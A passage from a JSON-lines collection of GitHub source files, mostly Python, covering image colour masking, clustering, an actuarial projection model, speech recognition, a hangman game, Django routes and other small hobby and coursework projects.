\"uint8\")\r\n \r\n lower_green= np.array([12,38,0], dtype = \"uint8\")\r\n upper_green= np.array([84,255,190], dtype = \"uint8\")\r\n\r\n mask_red= cv2.inRange(image, lower_red, upper_red)\r\n output_red= cv2.bitwise_and(image, image, mask = mask_red)\r\n \r\n mask_blue= cv2.inRange(image, lower_blue, upper_blue)\r\n output_blue= cv2.bitwise_and(image, image, mask = mask_blue)\r\n \r\n mask_green= cv2.inRange(image, lower_green, upper_green)\r\n output_green= cv2.bitwise_and(image, image, mask = mask_green)\r\n\r\n \r\n#lower_Black = np.array([0,0,0],dtype=\"uint8\")\r\n#upper_Black = np.array([50,50,100],dtype=\"uint8\")\r\n#mask_Black= cv2.inRange(image, lower_Black, upper_Black)\r\n#output_Black= cv2.bitwise_and(image, image, mask = mask_Black)\r\n\r\n\r\n\r\n\r\n # show the images\r\n output1=np.hstack([image, output_red])\r\n output2=np.hstack([output_blue,output_green])\r\n output3=np.vstack([output1,output2])\r\n cv2.imshow(\"color\",output3)\r\n print(Fore.GREEN+\" The color of the car photo was recorded in its own folder\")\r\n engine.say('The color of the car photo was recorded in its own folder')\r\n engine.runAndWait()\r\n addin='C:\\\\Users\\\\admin\\\\Desktop\\\\main.py\\\\'+dim+'\\\\'+'color '+dim+'.jpg'\r\n cv2.imwrite(addin,output3)\r\n cv2.waitKey(0) & 0xFF\r\n cv2.destroyAllWindows()\r\n ","repo_name":"mehrdadJAVA/License-plate-recognition-with-Python","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15147373959","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import KMeans\nimport numpy as np\n\n\n#GMM 聚类算法\nclass ClassJoin(object):\n def __init__(self):\n self.path = \"D:\\mr\\data.txt\"\n\n def kmean(self):\n data = pd.read_csv(self.path,sep=' ')\n x = data[[\"calories\",\"sodium\",\"alcohol\",\"cost\"]]\n std = StandardScaler()\n a_std = std.fit_transform(x)\n km = KMeans(n_clusters=3)\n colors = np.array(['red', 'green', 'blue', 'yellow'])\n km.fit(a_std)\n data['flag'] = km.labels_\n print(data.sort_values(\"flag\"))\n pd.plotting.scatter_matrix(data, c=colors[data['flag']], alpha=1, figsize=(10,10), s=100)\n #聚类评估:轮廓函数\n from sklearn import metrics\n score_scaled = metrics.silhouette_score(x, data.flag)\n print(score_scaled)\n\n scores = []\n for k in range(2, 20):\n labels = KMeans(n_clusters=k).fit(x).labels_\n score = metrics.silhouette_score(x, labels)\n scores.append(score)\n print(scores)\n plt.plot(list(range(2, 20)), scores)\n\n def dbscan(self):\n colors = np.array(['red', 'green', 'blue', 'yellow'])\n from sklearn.cluster import DBSCAN\n data = pd.read_csv(self.path, sep=' ')\n x = data[[\"calories\", \"sodium\", \"alcohol\", \"cost\"]]\n db = DBSCAN(eps=10, min_samples=2).fit(x)\n data['flag'] = db.labels_\n pd.plotting.scatter_matrix(data, c=colors[data['flag']], alpha=1, figsize=(10, 10), s=100)\n\n\n def gmm(self):\n data = pd.read_csv(self.path, sep=' ')\n x = data[[\"calories\", \"sodium\", \"alcohol\", \"cost\"]]\n from sklearn.mixture import GaussianMixture\n gmm = GaussianMixture(n_components=4).fit(x)\n labels = gmm.predict(x)\n labels\n plt.scatter(x[:1],x[:2], c=labels, s=40, cmp='viridis')\n\n\n\nif __name__ == '__main__':\n ClassJoin().gmm()","repo_name":"LTongSpark/mult","sub_path":"data/聚类.py","file_name":"聚类.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16574569506","text":"import math\n\nupper_limitA = input(\"Enter limit:\")\n\nupper_limit = eval(upper_limitA)\n\npower_index = 0\npower = 1\n\nwhile power <= (upper_limit/2):\n power_index+=1\n power = power*2\n\nlist=[]\nfor i in range(3,upper_limit+1):\n list.append(i)\n\n\nfor i in range(power_index,1,-1):\n list.remove(int (math.pow(2,i)))\n\nlength = len(list)\nfor i in range (0,length+1,10):\n print (list[i:i+10])\n\n","repo_name":"mariakalfountzou/First-Coding-Bootcamb","sub_path":"Python_Part_II/Exercise 11.py","file_name":"Exercise 11.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18943547687","text":"# %%\nimport heavylight\nimport pandas as pd\nimport numpy as np\n\n# A Vectorised Actuarial Contingency Model\n\n# %%\nclass Life(heavylight.Model):\n time_step = 1/12\n\n def t(self, t):\n return np.ones(self.data[\"data_count\"]) * t\n \n def num_pols_if(self, t):\n if t == 0:\n return self.data[\"initial_policies\"]\n else:\n return self.num_pols_if(t - 1) - self.num_deaths(t - 1)\n \n def num_deaths(self, t):\n if t == 0:\n return np.zeros(self.data[\"data_count\"])\n else:\n return self.num_pols_if(t) * self.q_x_m(t)\n \n def age(self, t):\n \"\"\"age at time t\"\"\"\n if t == 0:\n return self.data[\"initial_age\"] # floating point\n else:\n return self.age(t-1) + Life.time_step\n \n def age_rounded(self, t):\n return np.round(self.age(t))\n \n def q_x_m(self, t):\n \"\"\"monthly mortality rate\"\"\"\n return self.q_x(t) ** (Life.time_step)\n \n def q_x(self, t):\n \"\"\"annual mortality rate\"\"\"\n return self.basis[\"mortality\"].values(self.age_rounded(t))\n \n def premium(self, t):\n #print(self.data[\"premium\"])\n #print(self.num_pols_if(t))\n return self.data[\"premium\"] * self.num_pols_if(t)\n \n def claim(self, t):\n #print(f\"claim: {len(self.num_deaths(t))=}\")\n #print(f\"claim: {len(self.data['sum_assured'])=}\")\n return self.num_deaths(t) * self.data[\"sum_assured\"]\n\n def net_cashflow(self, t):\n return self.premium(t) - self.claim(t)\n \n def mpnum(self, t):\n return self.data[\"mp_num\"]\n\n\n# %%\nmortality = heavylight.Table.from_csv(\"sample_q_x_table.csv\")\n\n# %%\nmortality.series.loc[np.array([20, 21])]\n\n# %%\nbasis = {\"mortality\": mortality}\n\n# %%\n\n\ndef make_random_data(num_pols):\n rng = np.random.default_rng(seed=42)\n return_data = {}\n return_data[\"data_count\"] = num_pols\n return_data[\"initial_policies\"] = np.ones(num_pols)\n return_data[\"mp_num\"] = np.arange(num_pols)\n return_data[\"initial_age\"] = rng.uniform(low=20.0, high=21.0, size=num_pols)\n return_data[\"premium\"] = rng.beta(a=2, b=5, size=num_pols) * 100 + 50\n return_data[\"sum_assured\"] = return_data[\"premium\"] * 100 # rng.uniform(low=10.0, high=20, size=num_pols)\n return return_data\n\n\"\"\"\ndata = {\n \"initial_policies\": np.ones(num_model_points),\n \"initial_age\" : np.array([32+1/12, 42, 25+7/12]),\n \"premium\": np.array([100.65, 500, 220.34]),\n \"sum_assured\": np.array([10000, 30000, 25000]),\n }\n\"\"\"\n\n# num_model_points = 3\n\n\n# %%\ndata = make_random_data(1000)\nmodel = Life(data=data, basis=basis) #, do_run=True, proj_len = 5)\n\n# %%\nmodel.RunModel(proj_len=120, verbose=True)\n#df = model.ToDataFrame()\n\n\n\n#for t in range(10):\n# print(t, model.net_cashflow(t))\n\n# %%\ndef expand(model, variable):\n \"\"\"return a variable from the model as a dataframe\n rows = time\n columns = variables\n \"\"\"\n temp_df = pd.DataFrame(getattr(model, variable).values).T\n temp_df.index.name = \"t\"\n return temp_df\n# %%\ndef get_single_result(model, index):\n temp_df = model.ToDataFrame()\n # TODO: check type of each column\n # TODO: check that index is not out of bounds\n for column in temp_df:\n if isinstance(temp_df[column].iloc[0], np.ndarray):\n temp_df[column] = temp_df[column][index]\n return temp_df\n #return temp_df.applymap(lambda x: x[index])\n\n# %%\n\ndef dfize(model):\n columns = {}\n for func in model._funcs:\n func_values = getattr(model,func).values\n if isinstance(list(func_values.values())[0], np.ndarray):\n # multi-index\n temp_df = pd.DataFrame(func_values).T.stack()\n columns[func] = temp_df\n else:\n print(f\"Still to deal with {func}\")\n return pd.concat(columns, axis=1)\n\n\n # convert \n\n# %%\ndf = dfize(model)\ndf[df.mpnum==500].plot(x=\"t\", y=\"net_cashflow\") # can filter on a model point\n# %%\ndef npv(rate, values):\n values = np.atleast_2d(values)\n timestep_array = np.arange(0, values.shape[1])\n npv = (values / (1 + rate) ** timestep_array).sum(axis=1)\n try:\n # If size of array is one, return scalar\n return npv.item()\n except ValueError:\n # Otherwise, return entire array\n return npv\n# %%\nprint(\"npv\", npv(0.08, df[df.mpnum==500][\"net_cashflow\"]))\n# %%\nnpvs_4pc = df.groupby(\"mpnum\").agg({\"net_cashflow\": lambda x: npv(0.04, x)})\n# %%\n","repo_name":"lewisfogden/heavylight","sub_path":"examples/notebook/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"7973663225","text":"# -*- coding: utf-8 -*-\n\nimport pyaudio\nimport wave\nimport json\nimport requests\nimport base64\nfrom tkinter import *\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '你的 App ID'\nAPI_KEY = '你的 Api Key'\nSECRET_KEY = '你的 Secret Key'\n\n\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n\ndef get_token():\n host = 'https://aip.baidubce.com/oauth/2.0/token'\n grant_type = 'client_credentials'\n data = {'grant_type': grant_type, 'client_id': API_KEY, 'client_secret': SECRET_KEY}\n response = requests.post(host, data)\n token = response.json()['access_token']\n return token\n\n\ndef recognize(audio, token):\n url = 'http://vop.baidu.com/server_api'\n size = len(audio)\n data = {\n \"format\": \"wav\",\n \"rate\": 16000,\n \"dev_pid\": 1536,\n \"channel\": 1,\n \"token\": token,\n \"cuid\": APP_ID,\n \"len\": size,\n \"speech\": base64.b64encode(audio).decode('utf8'),\n }\n result = requests.post(url, json.dumps(data))\n rs = result.json()\n return rs\n\n\ndef ns():\n filePath = 'audio/output.wav'\n token = get_token()\n audio = get_file_content(filePath)\n rs = recognize(audio, token)\n\n if rs['err_msg'] == 'success.':\n rt = \"识别成功!\\n\" \\\n \"识别结果:\" + str(rs['result'][0])\n else:\n rt = \"识别失败!!!\\n\" \\\n \"错误码:\" + str(rs['err_no']) + \"\\n\" \\\n \"错误码描述:\" + rs['err_msg']\n\n return rt\n\n\ndef rc():\n CHUNK = 1600\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n RATE = 16000\n RECORD_SECONDS = 5\n WAVE_OUTPUT_FILENAME = \"audio/output.wav\"\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n print(\"* 录音开始\")\n\n frames = []\n\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n\n print(\"* 录音结束\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n\ndef netspeech():\n List.delete(0.0, END)\n List.insert(END, '录音开始\\n')\n List.update()\n rc()\n List.insert(END, '录音结束,正在识别,请耐心等待\\n')\n List.update()\n text = ns()\n List.insert(END, '识别结果为:\\n')\n List.insert(END, text)\n List.update()\n\n\nif __name__ == '__main__':\n win = Tk()\n win.title('语音识别')\n button = Button(win, text='直接识别', width=15, command=netspeech)\n button.grid(row=1, column=1, padx=20, pady=20)\n List = Text(win)\n List.grid(row=2, column=1, padx=20, pady=20)\n win.mainloop()\n","repo_name":"Ar7hurK/Speech","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33159799570","text":"from tokens import Token\n\n\nclass ExpressionNode:\n pass\n\n\nclass StatementsNode(ExpressionNode):\n\n def __init__(self):\n self.nodes = []\n\n def add_node(self, node: ExpressionNode):\n self.nodes.append(node)\n\n\nclass VariableNode(ExpressionNode):\n def __init__(self, variable: Token):\n self.variable = variable\n\n\nclass BinOperationNode(ExpressionNode):\n\n def __init__(self,\n operator: Token,\n left: ExpressionNode,\n right: ExpressionNode):\n self.operator = operator\n self.left = left\n self.right = right\n\n\nclass LogicalOperationNode(BinOperationNode):\n pass\n\n\nclass UnarOperationNode(ExpressionNode):\n def __init__(self, operator: Token, operand: ExpressionNode):\n self.operator = operator\n self.operand = operand\n\n\nclass NumberNode(ExpressionNode):\n def __init__(self, number: Token):\n self.number = number\n\n\nclass StringNode(ExpressionNode):\n def __init__(self, string: Token):\n string.text = string.text.replace(\"\\\"\", \"\") # Удаляем лишние ковычки\n self.string = string\n\n\nclass BooleanNode(ExpressionNode):\n def __init__(self, boolean: Token):\n self.boolean = boolean\n\n\nclass IfNode(ExpressionNode):\n def __init__(self, token: Token, cond: LogicalOperationNode, stms: StatementsNode):\n self.token = token\n self.cond = cond\n self.stms = stms\n\nclass ElseNode(ExpressionNode):\n def __init__(self, token: Token, stms: StatementsNode):\n self.token = token\n self.stms = stms\n\nclass WhileNode(ExpressionNode):\n def __init__(self, token: Token, cond: LogicalOperationNode, stms: StatementsNode):\n self.token = token\n self.cond = cond\n self.stms = stms\n\nclass ForNode(ExpressionNode):\n def __init__(self, token: Token, cond_stms, stms: StatementsNode):\n self.token = token\n self.cond = cond_stms\n self.stms = stms\nclass FunctionDeclarationNode(ExpressionNode):\n def __init__(self, id: Token, variables: list[Token], stms: StatementsNode):\n self.variables = variables\n self.token = id\n self.stms = stms\n\nclass FunctionInvokeNode(ExpressionNode):\n def __init__(self, id:Token, variables: list[Token]):\n self.token = id\n self.variables = variables\n\n\ndef print_ast(node: ExpressionNode, level=-1):\n offset_char = \"-\\t\"\n if isinstance(node, StatementsNode):\n for i in node.nodes:\n print_ast(i, level + 1)\n return\n if isinstance(node, VariableNode):\n print((offset_char * level) + str(node.variable))\n return\n if isinstance(node, NumberNode):\n print((offset_char * level) + str(node.number))\n return\n if isinstance(node, StringNode):\n print((offset_char * level) + str(node.string))\n return\n if isinstance(node, BooleanNode):\n print((offset_char * level) + str(node.boolean))\n return\n if isinstance(node, UnarOperationNode):\n print(str(offset_char * level) + \"UnarOperation: \" + str(node.operator))\n print_ast(node.operand, level + 1)\n return\n if isinstance(node, BinOperationNode):\n if isinstance(node, LogicalOperationNode):\n print(str(offset_char * level) + \"LogicalOperation: \" + str(node.operator))\n else:\n print(str(offset_char * level) + \"BinOperation: \" + str(node.operator))\n\n print(str(offset_char * level) + \"left: \")\n print_ast(node.left, level + 1)\n print(str(offset_char * level) + \"right: \")\n print_ast(node.right, level + 1)\n return\n if isinstance(node, IfNode):\n print(str(offset_char * level) + \"IfStatement: \" + str(node.token))\n print(str(offset_char * level) + \"Condition: \")\n print_ast(node.cond, level + 1)\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level + 1)\n return\n if isinstance(node, ElseNode):\n print(str(offset_char * level) + \"ElseStatement: \" + str(node.token))\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level + 1)\n return\n if isinstance(node, WhileNode):\n print(str(offset_char * level) + \"WhileNode: \" + str(node.token))\n print(str(offset_char * level) + \"Condition: \")\n print_ast(node.cond, level + 1)\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level + 1)\n return\n if isinstance(node, ForNode):\n print(str(offset_char * level) + \"FOR: \" + str(node.token))\n print(str(offset_char * level) + \"Condition: \")\n for i in node.cond:\n print_ast(i, level+1)\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level+1)\n if isinstance(node, FunctionDeclarationNode):\n print(str(offset_char * level) + \"FunctionDeclaration: \" + str(node.token))\n print(str(offset_char * level) + \"Variables:\")\n for v in node.variables:\n print(str(offset_char * level) + \"- VAR: \" + str(v))\n print(str(offset_char * level) + \"Stms:\")\n print_ast(node.stms, level + 1)\n if isinstance(node, FunctionInvokeNode):\n print(str(offset_char * level) + \"FunctionInvocation: \" + str(node.token))\n print(str(offset_char * (level+1)) + \"Variables:\")\n for v in node.variables:\n if isinstance(v, Token):\n print(str(offset_char * level) + \" token: \" + str(v))\n else:\n print_ast(v, level+1)\n\n\n","repo_name":"santygo1/translator","sub_path":"abs_st.py","file_name":"abs_st.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8353041806","text":"import json\nimport os\n\nMETADATA_FILE=\"config.json\"\nCONFIG_DICT = None\n\ndef create_recipe(recipe_name, cuisine_type, ingredients):\n if not os.path.exists(CONFIG_DICT[\"main_folder\"] + \"/{}\".format(cuisine_type)):\n os.makedirs(CONFIG_DICT[\"main_folder\"] + \"/{}\".format(cuisine_type))\n\n with open(CONFIG_DICT[\"main_folder\"] + \"/{}/{}.txt\".format(cuisine_type, recipe_name), 'w+') as f:\n f.write(ingredients)\n\ndef add_recipe():\n recipe_name = input(\"\"\"Enter name of the recipe\\n{}\\n\"\"\".format(\"*\" * 50))\n cuisine_type = input(\"\"\"Enter type of cuisine like Indian, Arabian etc.\\n{}\\n\"\"\".format(\"*\" * 50))\n total_portion = input(\"\"\"Enter Total portion in mg\\n{}\\n\"\"\".format(\"*\" * 50))\n ingredients = input(\"\"\"Enter ingredients and amount in ingredient=amount(in mg) format. Each ingredient in a separate line\\n{}\\n\"\"\".format(\"*\" * 50))\n ingredients += \"\\nTotal Portion={}\".format(total_portion)\n create_recipe(recipe_name, cuisine_type, ingredients)\n\ndef list_recipes():\n pass\n\ndef text_file_path_to_dict(file_path):\n with open(file_path,'r') as f:\n text = f.read()\n\n if text:\n return {line.split(\"=\")[0].strip():line.split(\"=\")[1].strip() for line in text.split(\"\\n\") if line}\n\n return dict()\n\ndef print_recipe(recipe_path, recipe_name, file_path):\n with open(file_path,'r') as f:\n text = f.read()\n print(\"Cuisine Type: {}\\nRecipe Name: {}\\nIngredients: \\n\\n{}\\n{}\\n\".format(\"-->\".join(recipe_path), recipe_name, text, \"*\" * 50))\n\ndef filter_recipes():\n exclude_ingredients = input(\"\"\"Enter ingredients that needs to be excluded from the recipe comma separated.\\n{}\\n\"\"\".format(\"*\" * 50))\n include_ingredients = input(\"\"\"Enter ingredients that needs to be included in the recipe comma separated.\\n{}\\n\"\"\".format(\"*\" * 50))\n\n exclude_ingredients_list = [x.strip() for x in exclude_ingredients.split(\",\")]\n include_ingredients_list = [x.strip() for x in include_ingredients.split(\",\")]\n\n for root, dirs, files in os.walk(\"Main\"):\n path = root.split(os.sep)\n for file in files:\n file_path = \"/\".join(path + [file])\n ingredient_dict = text_file_path_to_dict(file_path)\n\n if (any(x in ingredient_dict.keys() for x in include_ingredients_list) or not include_ingredients) and not any(x in ingredient_dict.keys() for x in exclude_ingredients_list):\n print_recipe(path[1:], file.split(\".txt\")[0], file_path)\n\n # print(\"-->\".join(file_path[1:]))\n\n\ndef modify_recipe():\n pass\n\ndef get_config():\n with open(METADATA_FILE, 'r') as f:\n return json.load(f)\n\ndef main_function():\n global CONFIG_DICT\n\n CONFIG_DICT = get_config()\n options=\"\"\"Enter an option from the below\n 1. Add a recipe\n 2. List recipes\n 3. Filter recipes\n 4. Modify total portion of a recipe\n {}\n \"\"\".format(\"*\"*50)\n selected_option = input(options)\n print(selected_option)\n if selected_option == \"1\":\n add_recipe()\n elif selected_option == \"2\":\n list_recipes()\n elif selected_option == \"3\":\n filter_recipes()\n elif selected_option == \"4\":\n modify_recipe()\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n main_function()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"shanto12/rose_diet_software","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20707370021","text":"\"\"\"\nQuestion: https://leetcode.com/problems/repeated-dna-sequences/\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n\n windowLength = 10\n previouslySeen = set()\n resultSet = set()\n for i in range(0, len(s)):\n currentSequence = s[i:i+windowLength]\n if currentSequence in previouslySeen:\n resultSet.add(currentSequence)\n else:\n previouslySeen.add(currentSequence)\n\n return resultSet\n\n\ntestCases = [\n {\n \"s\": \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\",\n \"output\": [\"AAAAACCCCC\", \"CCCCCAAAAA\"]\n },\n {\n \"s\": \"AAAAAAAAAAAAA\",\n \"output\": [\"AAAAAAAAAA\"]\n }\n]\n\n\nfor testCase in testCases:\n runner = Solution()\n result = runner.findRepeatedDnaSequences(testCase[\"s\"])\n print(result)\n","repo_name":"rupinjairaj/rupinjairaj.github.io","sub_path":"submissions/slidingWindow/repeatedDNASequences.py","file_name":"repeatedDNASequences.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18839810622","text":"\"\"\"\nda un'idea online anonima\nriadattamento per il laboratorio python delle scuole superiori di Monfalcone e Staranzano\nautore: Maurizio Colautti\nctrl.mau@gmail.com \n\nnota: la versione corrente e' volutamente semplificata per poter adattarsi\n ad una lezione di 3 ore per ragazzi con un certo tipo di competenze\n\"\"\"\n\nimport time\nimport random\n\nprint(\"\\nBenvenuto al gioco dell'impiccato\\n\")\nnome = input(\"Come ti chiami? \") # comando per interagire con l'utente\nprint(\"Ciao \" + nome + \"! Buona fortuna\")\ntime.sleep(3)\n\n# \"terza versione\" => complichiamo molto il gioco con una lunga lista di parole da cui pescare\n# lettura file -> ogni riga un elemento di una lista\nwith open(\"parole.txt\") as file_parole:\n parole = file_parole.readlines()\n\n# la \"seconda versione\" usava questa lista di parole...\n# parole = [\"studente\", \"lezione\", \"sport\", \"computer\", \"daino\", \"baseball\"]\n# la \"prima versione\" usava una parola fissa\n# parola = \"studente\"\n# scelta di una parola a caso\nparola = random.choice(parole)\n# alla quale va rimosso il carattere di \"newline\"\nparola = parola.replace(\"\\n\", \"\")\nparola_originale = parola\nlunghezza = len(parola)\ngia_provato = []\nmostra = \"-\" * lunghezza\n\n\ntentativi = 5\nindovinato = False\n\nwhile tentativi > 0 and not indovinato:\n\n # introduzione testuale ad ogni tentativo\n print(\"Tentativi rimasti:\", tentativi)\n time.sleep(2)\n print(\"La parola da indovinare è:\", mostra)\n\n # chiedo una lettera\n while True:\n prova = input(\"Prova con una nuova lettera: \\n\")\n time.sleep(1)\n\n if prova not in gia_provato:\n gia_provato.append(prova)\n break\n else: # questo \"else\" poteva essere evitato ;)\n print(\"La lettera\", prova, \"è già stata tentata\")\n time.sleep(1)\n\n # lettera buona!\n if prova in parola:\n print(\"lettera azzeccata\")\n while parola.find(prova) != -1:\n indice = parola.find(prova)\n parola = parola[:indice] + \"#\" + parola[indice+1:]\n mostra = mostra[:indice] + prova + mostra[indice+1:]\n time.sleep(1)\n\n if \"-\" not in mostra:\n print(\"\")\n print(\"Woooah! Sei riuscito ad indovinare la parola!\")\n print(\"la parola era:\", mostra)\n indovinato = True\n\n # lettera errata!\n else:\n print(\"La lettera\", prova, \"non è parte della parola misteriosa\")\n tentativi = tentativi - 1\n\n if tentativi == 4:\n print(\" _____ \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 3:\n print(\" _____ \\n\"\n \" | |\\n\"\n \" | |\\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 2:\n print(\" _____ \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 1:\n print(\" _____ \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | O \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 0:\n print(\" _____ \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | O \\n\"\n \" | /|\\ \\n\"\n \" | / \\ \\n\"\n \"__|__\\n\")\n print(\"La parola da indovinare era:\", parola_originale)\n\n\nprint(\"\")\nprint(\"Gioco finito\")\nif indovinato:\n print(\"Sei stato bravo, ma vincerai la prossima volta?\")\nelse:\n print(\"Peccato non sei riuscito ad indovinare la parola\")\n","repo_name":"ctrlmau/laboratorio-python-2023","sub_path":"01-impiccato/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1879804287","text":"\"\"\"donanciones URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom juguetes import views\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\n\turl(r'^$', views.index),\n\turl(r'^donacion/$', views.cliente),\n\turl(r'^log_in/$', views.log_in),\n\turl(r'^log_out/$', views.log_out),\n\n\turl(r'^estado/(\\d{1,10})/$', views.estado),\n\turl(r'^estado/(\\d{1,10})/eliminar$', views.estado_eliminar),\n\turl(r'^estado/listado/$', views.estados),\n\turl(r'^estado/nuevo$', views.estado_nuevo),\n\t\n\turl(r'^donacion/(\\d{1,10})/$', views.donacion),\n\turl(r'^donacion/(\\d{1,10})/eliminar$', views.donacion_eliminar),\n\turl(r'^donacion/listado$', views.donaciones),\n\turl(r'^donacion/nuevo$', views.donacion_nuevo),\n\t\n\turl(r'^donante/(\\d{1,10})/$', views.donante),\n\turl(r'^donante/(\\d{1,10})/eliminar$', views.donante_eliminar),\n\turl(r'^donante/listado$', views.donantes),\n\turl(r'^donante/nuevo$', views.donante_nuevo),\n\n\turl(r'^juguete/(\\d{1,10})/$', views.juguete),\n\turl(r'^juguete/(\\d{1,10})/eliminar$', views.juguete_eliminar),\n\turl(r'^juguete/listado$', views.juguetes),\n\turl(r'^juguete/nuevo$', views.juguete_nuevo),\n\n\turl(\"\", include('social.apps.django_app.urls', namespace='social')),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"leorb23/donanciones","sub_path":"donanciones/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70886057287","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ndirect Python Toolbox\nAll-in-one toolbox to encapsulate Python runtime variants\n----------------------------------------------------------------------------\n(C) direct Netware Group - All rights reserved\nhttps://www.direct-netware.de/redirect?dpt;builder_suite\n\nThis Source Code Form is subject to the terms of the Mozilla Public License,\nv. 2.0. If a copy of the MPL was not distributed with this file, You can\nobtain one at http://mozilla.org/MPL/2.0/.\n----------------------------------------------------------------------------\nhttps://www.direct-netware.de/redirect?licenses;mpl2\n----------------------------------------------------------------------------\n#echo(dptBuilderSuiteVersion)#\n#echo(__FILEPATH__)#\n\"\"\"\n\nfrom os import path\n\nfrom ..copy_builder import CopyBuilder\n\nclass InstallCopiedAndExtendedData(object):\n \"\"\"\nThis class provides the callback to copy and extend source files with the\nrequested extensions.\n\n:author: direct Netware Group\n:copyright: direct Netware Group - All rights reserved\n:package: dpt\n:subpackage: builder_suite\n:since: v1.0.0\n:license: https://www.direct-netware.de/redirect?licenses;mpl2\n Mozilla Public License, v. 2.0\n \"\"\"\n\n __slots__ = ( )\n \"\"\"\npython.org: __slots__ reserves space for the declared variables and prevents\nthe automatic creation of __dict__ and __weakref__ for each instance.\n \"\"\"\n\n @staticmethod\n def callback(source_dir_path, target_path, target_parameters):\n \"\"\"\nCallback to be used in \"dNG.distutils.InstallData\".\n\n:param source_dir_path: Source directory to copy files in\n:param target_path: Target directory for build\n:param target_parameters: Target parameters\n\n:since: v1.0.0\n \"\"\"\n\n target_extensions = target_parameters.get(\"copy_builder_extensions\")\n\n if (type(target_extensions) is list and len(target_extensions) > 0):\n copy_builder = CopyBuilder(target_parameters,\n source_dir_path,\n target_path,\n target_extensions,\n default_chmod_files = \"0644\",\n default_chmod_dirs = \"0755\"\n )\n\n if (target_parameters.get(\"copy_builder_strip_source_dir_path\", False)):\n copy_builder.set_strip_prefix(source_dir_path + path.sep)\n #\n\n copy_builder.make_all()\n #\n #\n#\n","repo_name":"dNG-git/dpt_builder_suite","sub_path":"src/dpt_builder_suite/distutils/install_copied_and_extended_data.py","file_name":"install_copied_and_extended_data.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17345047374","text":"from yahoo_finance import Share\nimport pandas as pd\nimport 